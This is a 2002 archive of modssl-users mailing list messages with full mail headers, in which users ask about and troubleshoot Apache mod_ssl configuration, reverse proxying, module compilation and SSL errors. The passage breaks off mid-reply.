X-List-Name: modssl-users

Hello !!!

I am using Apache/2.0.36 (Win32) DAV/2 on Win98.
my server  is running very fine when i use PHP4 as a interpreter.
but as i use " LoadModule  " to use PHP4 as a modules i am getting the 
error as
(31) A device attached to the system is not functioning:

This error also come when i try to load SSL
I also tried to run server on Win 2k. Same error :(


Can any one help me out. why this error is comming ?

Or where i am wrong ?

Thanks is advance
Prachait Saxena
WebMaster [SitesOnTesting.Com]

If you do for other's ! Other's will do for you !!
Visit me at http://www.sitesontesting.com/prachait


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 14 04:30:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA13402; Fri, 14 Jun 2002 04:29:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail8.nc.rr.com id EAA13377; Fri, 14 Jun 2002 04:28:25 +0200 (MET DST)
Received: from mail pickup service by mail8.nc.rr.com with Microsoft SMTPSVC;
	 Thu, 13 Jun 2002 22:26:44 -0400
Received: from ncmx02.mgw.rr.com ([24.93.67.222]) by mail8.nc.rr.com  with Microsoft SMTPSVC(5.5.1877.757.75);
	 Wed, 12 Jun 2002 08:12:22 -0400
Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252])
	by ncmx02.mgw.rr.com (8.12.2/8.12.2) with ESMTP id g5CCCLa2017982
	for ; Wed, 12 Jun 2002 08:12:22 -0400 (EDT)
Received: by mmx.engelschall.com (Postfix)
	id 4D36819570; Wed, 12 Jun 2002 14:11:17 +0200 (CEST)
Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153])
	by mmx.engelschall.com (Postfix) with ESMTP id 18E021955A
	for ; Wed, 12 Jun 2002 14:11:17 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA21094; Wed, 12 Jun 2002 14:10:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from godden.net id OAA20983; Wed, 12 Jun 2002 14:09:05 +0200 (MET DST)
Received: (qmail 32101 invoked from network); 12 Jun 2002 12:09:01 -0000
Received: from unknown (HELO godden.net) (10.0.0.3)
  by 0 with SMTP; 12 Jun 2002 12:09:01 -0000
Message-ID: <3D0739D7.9657779A@godden.net>
Date: Wed, 12 Jun 2002 14:08:55 +0200
From: Wim Godden 
Organization: FirstLink Networks
X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: 1 certificate for several sites using redirection ?
References: <9B66BBD37D5DD411B8CE00508B69700F020671CC@pborolocal.rnib.org.uk> <3D073574.3060301@itaction.co.uk>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Sender: Wim Godden 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Wim Godden 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

So there's no system which allows me to really proxy pages and 'modify' them so
that all future connections go through this 'proxy' as well ?

Greetings,

Wim

Peter Viertel wrote:

> yes, i think thats whats happening - you need to review the website
> content you are pointing at. For this to work you can't have any
> absolute hrefs, and also the backend site may issue redirects, for these
> to work you need a ProxyPassReverse which will rewrite the Location:
> header on any redirects the backend site may send.
>
>  For example:
>
> ProxyPass /test    http://other.subdomain.ourdomain.com/
> ProxyPassReverse /test  http://other.subdomain.ourdomain.com/
>
> proxypassreverse unfortunately is not case insensitive, and the backend
> webserver may refer to itself canonically, so the location headers may
> have another hostname. Either fix up the backend webserver to match the
> proxypassreverse, or add extra proxypassreverse lines.
>
> The most common cause of redirects is the / bug handlers of tomcat, and
> IIS which kick in if your url ends with / and that resolves to a
> directory, then the webserver looks up what the directoryindex script is
> (eg. index.html) and sends a redirect. This is something to do with
> early revision browser releases, I have no idea which ones or if it
> matters anymore.
>
> Also note that mod_proxy got a big upgrade at apache release 1.3.23 that
> may help things along too in certain cases.
>
> John.Airey@rnib.org.uk wrote:
>
> >Sounds like you have some absolute links rather than relative links. You can
> >also use
> >proxypass /test https://other-subdomain.ourdomain.com
> >
> >If the data needs to be secured between the proxy and the destination
> >server.
> >
> >-
> >John Airey
> >Internet systems support officer, ITCSD, Royal National Institute of the
> >Blind,
> >Bakewell Road, Peterborough PE2 6XU,
> >Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk
> >
> >Is the statement 'There is no such thing as truth'  true?
> >
> >
> >
> >
> >>-----Original Message-----
> >>From: Wim Godden [mailto:wim@godden.net]
> >>Sent: 12 June 2002 11:06
> >>To: modssl-users@modssl.org
> >>Subject: Re: 1 certificate for several sites using redirection ?
> >>
> >>
> >>proxypass /test http://other-subdomain.ourdomain.com
> >>doesn't work properly... I get errors about the images being
> >>insecure and all links
> >>point to the wrong position.
> >>
> >>
> >>Peter Viertel wrote:
> >>
> >>
> >>
> >>>You could do that using reverse proxy, ie mod_proxy.
> >>>Redirects are not going to help.
> >>>
> >>>Wim Godden wrote:
> >>>
> >>>
> >>>
> >>>>Hi,
> >>>>
> >>>>I'd like to use a certificate to secure several of our
> >>>>
> >>>>
> >>subdomains...
> >>
> >>
> >>>>buying hundreds of certificates is simply too expensive.
> >>>>Is there some way to do this :
> >>>>
> >>>>- Install certificate on secure.ourdomain.com
> >>>>- Let people surf to
> >>>>
> >>>>
> >>>https://secure.ourdomain.com/other-subdomain.ourdomain.com/wh
> >>>
> >>>
> >at-ever-page.html
> >
> >
> >>>Thanks in advance.
> >>>
> >>>
> >>>Greetings,
> >>>
> >>>Wim Godden
> >>>
> >>>______________________________________________________________________
> >>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >>>User Support Mailing List                      modssl-users@modssl.org
> >>>Automated List Manager                            majordomo@modssl.org
> >>>
> >>>
> >>>
> >>>
> >>______________________________________________________________________
> >>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >>User Support Mailing List                      modssl-users@modssl.org
> >>Automated List Manager                            majordomo@modssl.org
> >>
> >>
> >
> >--
> >------
> >Adverteren.be - 100% Nederlandstalig adverteren op kwalitatief hoogstaande
> >sites !
> >
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
> >-
> >
> >NOTICE: The information contained in this email and any attachments is
> >confidential and may be legally privileged. If you are not the
> >intended recipient you are hereby notified that you must not use,
> >disclose, distribute, copy, print or rely on this email's content. If
> >you are not the intended recipient, please notify the sender
> >immediately and then delete the email and any attachments from your
> >system.
> >
> >RNIB has made strenuous efforts to ensure that emails and any
> >attachments generated by its staff are free from viruses. However, it
> >cannot accept any responsibility for any viruses which are
> >transmitted. We therefore recommend you scan all attachments.
> >
> >Please note that the statements and views expressed in this email
> >and any attachments are those of the author and do not necessarily
> >represent those of RNIB.
> >
> >RNIB Registered Charity Number: 226227
> >
> >Website: http://www.rnib.org.uk
> >
> >14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
> >find out all about it.
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
> >
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--
------
Adverteren.be - 100% Nederlandstalig adverteren op kwalitatief hoogstaande sites
!


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 14 05:07:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA14943; Fri, 14 Jun 2002 05:06:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail8.nc.rr.com id FAA14932; Fri, 14 Jun 2002 05:05:51 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from mail pickup service by mail8.nc.rr.com with Microsoft SMTPSVC;
	 Thu, 13 Jun 2002 22:59:23 -0400
Received: from ncmx01.mgw.rr.com ([24.93.67.251]) by mail8.nc.rr.com  with Microsoft SMTPSVC(5.5.1877.757.75);
	 Wed, 12 Jun 2002 06:23:48 -0400
Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252])
	by ncmx01.mgw.rr.com (8.12.2/8.12.2) with ESMTP id g5CANnbC012353
	for ; Wed, 12 Jun 2002 06:23:50 -0400 (EDT)
Received: by mmx.engelschall.com (Postfix)
	id 7618E194F7; Wed, 12 Jun 2002 12:23:18 +0200 (CEST)
Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153])
	by mmx.engelschall.com (Postfix) with ESMTP id 479CD194F3
	for ; Wed, 12 Jun 2002 12:23:18 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA15244; Wed, 12 Jun 2002 12:22:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id MAA15215; Wed, 12 Jun 2002 12:21:44 +0200 (MET DST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g5CALO005354
	for ; Wed, 12 Jun 2002 11:21:29 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Wed, 12 Jun 2002 11:21:20 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F020671CC@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: 1 certificate for several sites using redirection ?
Date: Wed, 12 Jun 2002 11:21:19 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Sounds like you have some absolute links rather than relative links. You can
also use 
proxypass /test https://other-subdomain.ourdomain.com

If the data needs to be secured between the proxy and the destination
server.

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Is the statement 'There is no such thing as truth'  true?


> -----Original Message-----
> From: Wim Godden [mailto:wim@godden.net]
> Sent: 12 June 2002 11:06
> To: modssl-users@modssl.org
> Subject: Re: 1 certificate for several sites using redirection ?
> 
> 
> proxypass /test http://other-subdomain.ourdomain.com
> doesn't work properly... I get errors about the images being 
> insecure and all links
> point to the wrong position.
> 
> 
> Peter Viertel wrote:
> 
> > You could do that using reverse proxy, ie mod_proxy.
> > Redirects are not going to help.
> >
> > Wim Godden wrote:
> >
> > >Hi,
> > >
> > >I'd like to use a certificate to secure several of our 
> subdomains...
> > >buying hundreds of certificates is simply too expensive.
> > >Is there some way to do this :
> > >
> > >- Install certificate on secure.ourdomain.com
> > >- Let people surf to
> > 
> >https://secure.ourdomain.com/other-subdomain.ourdomain.com/wh
at-ever-page.html
> >
> >Thanks in advance.
> >
> >
> >Greetings,
> >
> >Wim Godden
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
> >
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--
------
Adverteren.be - 100% Nederlandstalig adverteren op kwalitatief hoogstaande
sites !


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 14 05:08:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA14994; Fri, 14 Jun 2002 05:07:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id FAA14972; Fri, 14 Jun 2002 05:06:50 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5E32Xv06381;
	Thu, 13 Jun 2002 23:02:35 -0400
Date: Thu, 13 Jun 2002 23:02:33 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
cc: phil@netroedge.com
Subject: Re: SSLRequireSSL Circumvention
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 4 Jun 2002, Cliff Woolley wrote:

> > BTW- I originally put in the 'deny from all' and 'satisfy any' lines
> > because I had another line 'allow from .my-domain.com' inbetween them
> > at one point.  Which makes me wonder, what would I do if I wanted to
> > put it back in?
>
> Ah, forgot to respond to this part.  If you want that, then you would
> obviously have to use 'satisfy any'.  And in that case, you can't use
> SSLRequireSSL.  You can use a RewriteRule to get the same effect.

I just discovered a config option of which I was previously unaware that
would help here.  From the SSLOptions directive:

#   o StrictRequire:
#     This denies access when "SSLRequireSSL" or "SSLRequire" applied even
#     under a "Satisfy any" situation, i.e. when it applies access is denied
#     and no other module can change it.

So add:

 SSLOptions +StrictRequire

and then your scenario will work.  Sorry for misleading you earlier!

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 14 16:31:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA22113; Fri, 14 Jun 2002 16:30:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA22067; Fri, 14 Jun 2002 16:29:31 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E86B54CE789; Fri, 14 Jun 2002 16:29:30 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 4350828969; Fri, 14 Jun 2002 16:27:39 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mta02-svc.ntlworld.com id PAA19277; Fri, 14 Jun 2002 15:32:36 +0200 (MET DST)
Received: from ws ([80.6.192.198]) by mta02-svc.ntlworld.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP
          id <20020614133236.IBWQ4626.mta02-svc.ntlworld.com@ws>
          for ; Fri, 14 Jun 2002 14:32:36 +0100
Message-ID: <03e901c213a7$12172c90$667ba8c0@ws>
From: "Zac Hillier" 
To: 
Subject: SSLPassPhraseDialog
Date: Fri, 14 Jun 2002 14:25:32 +0100
Organization: Net Affectors
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Zac Hillier" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Can anyone help? I'm trying to set-up the ssl_module on apache 2 under
Mandrake 8.1

When  I start the server I get an error message 'Invalid Command
"SSLPassPhraseDialog"' in the ssl.conf this is trying to call builtin.
However I'm not sure where to turn to resolve this issue, if I comment out
the line in the conf file then a further error occurs for the next item in
the conf file 'SSLSessionCahce'.

Please help it's driving me slowly mad  = {

Thanks

Zac
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 14 16:38:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA22375; Fri, 14 Jun 2002 16:37:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.staff.tdk.net id QAA22363; Fri, 14 Jun 2002 16:36:59 +0200 (MET DST)
Received: by marvin-lnx.staff.tdk.net (Postfix, from userid 500)
	id 3B2E0BD2C; Fri, 14 Jun 2002 16:37:23 +0200 (CEST)
Date: Fri, 14 Jun 2002 16:37:23 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: SSLPassPhraseDialog
Message-ID: <20020614143723.GD3006@marvin-lnx.staff.tdk.net>
Mail-Followup-To: modssl-users@modssl.org
References: <03e901c213a7$12172c90$667ba8c0@ws>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <03e901c213a7$12172c90$667ba8c0@ws>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, Jun 14, 2002 at 02:25:32PM +0100, Zac Hillier wrote:
> Can anyone help? I'm trying to set-up the ssl_module on apache 2 under
> Mandrake 8.1
> 
> When  I start the server I get an error message 'Invalid Command
> "SSLPassPhraseDialog"' in the ssl.conf this is trying to call builtin.
> However I'm not sure where to turn to resolve this issue, if I comment out
> the line in the conf file then a further error occurs for the next item in
> the conf file 'SSLSessionCahce'.
> 
> Please help it's driving me slowly mad  = {
> 

It looks like your apache2 has been compiled without ssl support, or
that the module has not been loaded.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 14 16:56:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA23924; Fri, 14 Jun 2002 16:55:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mta02-svc.ntlworld.com id QAA23913; Fri, 14 Jun 2002 16:54:50 +0200 (MET DST)
Received: from ws ([80.6.192.198]) by mta02-svc.ntlworld.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP
          id <20020614145449.LKBX4626.mta02-svc.ntlworld.com@ws>
          for ; Fri, 14 Jun 2002 15:54:49 +0100
Message-ID: <048401c213b2$8ead1750$667ba8c0@ws>
From: "Zac Hillier" 
To: 
Subject: ssl module compiling
Date: Fri, 14 Jun 2002 15:48:32 +0100
Organization: Net Affectors
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Zac Hillier" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Is there an way to compile the ssl module on its own to then at it to apache
2 with the LoadModule option?

I have the ssl folder from the apache 2 tar download in modules

Thanks

Zac

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 14 20:54:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA06194; Fri, 14 Jun 2002 20:53:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA06158; Fri, 14 Jun 2002 20:52:15 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9BF894CE743; Fri, 14 Jun 2002 20:52:14 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 22D2E28969; Fri, 14 Jun 2002 20:35:19 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from grn.georet.net id QAA22070; Fri, 14 Jun 2002 16:29:40 +0200 (MET DST)
Received: from achan (yoshi_internal.georet.net [209.190.97.158])
	by grn.georet.net (8.11.0/8.11.0) with SMTP id g5EETUC04392
	for ; Fri, 14 Jun 2002 10:29:31 -0400
Message-ID: <00ce01c213b0$2bc38180$1601020a@georet.net>
From: "James L. Morris" 
To: 
Subject: newbie - ssl directives
Date: Fri, 14 Jun 2002 10:31:27 -0400
Organization: Georetiary Networks, Inc.
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "James L. Morris" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

Virtual servers on Apache 1.3.23 with mod_ssl:

How do I turn on SSL for one page within (an order page) within a site?  I'm
having trouble finding the right info and don't want to geek something up.
If anyone has a good link or snip from a conf file would be much
appreciated.  Thanks to all.
Jim
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 14 20:54:57 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA06198; Fri, 14 Jun 2002 20:53:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA06160; Fri, 14 Jun 2002 20:52:16 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id BDFF64CE77D; Fri, 14 Jun 2002 20:52:14 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 2A38E2898F; Fri, 14 Jun 2002 20:35:29 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hoemail2.firewall.lucent.com id SAA29387; Fri, 14 Jun 2002 18:29:02 +0200 (MET DST)
Received: from nj7460exch002h.wins.lucent.com (h135-17-42-35.lucent.com [135.17.42.35])
	by hoemail2.firewall.lucent.com (Switch-2.2.2/Switch-2.2.0) with ESMTP id g5EGStg29336
	for ; Fri, 14 Jun 2002 12:28:56 -0400 (EDT)
Received: by nj7460exch002h.ho.lucent.com with Internet Mail Service (5.5.2653.19)
	id ; Fri, 14 Jun 2002 12:28:55 -0400
Message-ID: <2E12619580C0D1118C6400805F9F4C950F7550EA@nj7460exch001u.ho.lucent.com>
From: "Kollu, Ravindranath (Ravindranath)" 
To: modssl-users@modssl.org
Subject: Help on "bad record mac error"
Date: Fri, 14 Jun 2002 12:28:53 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kollu, Ravindranath (Ravindranath)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

Our server runs apache as reverse proxy, proxying a JMS application server listening on a ssl port.
Request from browser hits the proxy which redirects with rewrite rule to the application server.
We are running mod_ssl-2.7.1-1.3.14.tar.gz  release.


Some times the communication is established  successfully, 
but after a while we are getting the following error and the session is closed.


SSL proxy connect failed (): peer :>port number>: sslv3 alert bad record mac

Is there any known problem with these releases? what does this error means?
Is there any setting we can do to avoid this?


Thanks
Ravi Kollu
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 15 00:16:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA19125; Sat, 15 Jun 2002 00:15:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mta07-svc.ntlworld.com id AAA19086; Sat, 15 Jun 2002 00:14:50 +0200 (MET DST)
Received: from ws ([80.6.192.198]) by mta07-svc.ntlworld.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP
          id <20020614221449.TVFH19225.mta07-svc.ntlworld.com@ws>
          for ; Fri, 14 Jun 2002 23:14:49 +0100
Message-ID: <05d501c213f0$06f12160$667ba8c0@ws>
From: "Zac Hillier" 
To: 
Subject: installing with apache 2 and mod_ssl
Date: Fri, 14 Jun 2002 23:08:32 +0100
Organization: Net Affectors
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Zac Hillier" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi All,

Can you help? I'm trying to install apache 2.0.36 with mod_ssl and having
real trouble I have re-installed a couple of times now once specifically
with --enable-ssl=shared and once with --enable-shared=all each time the
mod_ssl does not appear to compile into the modules dir and is not present
in any of the conf files?

Can anyone suggest what I'm doing wrong.

Thanks

Zac

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 15 00:27:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA19705; Sat, 15 Jun 2002 00:26:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id AAA19676; Sat, 15 Jun 2002 00:25:54 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5EMLTj13611;
	Fri, 14 Jun 2002 18:21:29 -0400
Date: Fri, 14 Jun 2002 18:21:29 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: Zac Hillier 
cc: modssl-users@modssl.org
Subject: Re: installing with apache 2 and mod_ssl
In-Reply-To: <05d501c213f0$06f12160$667ba8c0@ws>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 14 Jun 2002, Zac Hillier wrote:

> Can you help? I'm trying to install apache 2.0.36 with mod_ssl and having
> real trouble I have re-installed a couple of times now once specifically
> with --enable-ssl=shared and once with --enable-shared=all each time the
> mod_ssl does not appear to compile into the modules dir and is not present
> in any of the conf files?

What does the configure output say around the spot where it says "checking
whether to enable mod_ssl"?  Chances are, it's not finding your OpenSSL
installation (which is a dependency for mod_ssl), and it's therefore
skipping mod_ssl.  (Hint: use --with-ssl= to tell it where to look.)
Now, it's strange that it would do that with --enable-shared=all (=all is
supposed to me "fail if you can't find some module's dependencies"), but
